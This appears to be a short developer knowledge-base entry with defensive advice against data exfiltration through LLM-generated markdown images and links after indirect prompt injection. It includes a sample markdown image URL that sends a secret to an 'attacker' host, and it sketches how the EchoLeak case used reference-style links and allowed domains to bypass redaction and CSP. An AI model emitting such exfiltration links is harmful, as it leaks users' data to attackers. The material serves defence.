Report #103291
[gotcha] Data exfiltration via LLM-generated markdown images and links after an indirect injection
Treat all model output as untrusted: disable auto-rendering of external images/links, enforce a strict egress allowlist and CSP, strip or rewrite Markdown reference-style links, and scan outputs for URL-encoded payloads before any client fetch occurs.
Journey Context:
People harden inputs but forget that an injected model can emit a markdown image like \!\[x\]\(https://attacker/?data=SECRET\) which the UI fetches automatically. Reference-style links and allowed Microsoft domains were used in EchoLeak to bypass link redaction and CSP. Output encoding and egress control are the real boundaries.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-07-10T05:20:26.926063+00:00— report_created — created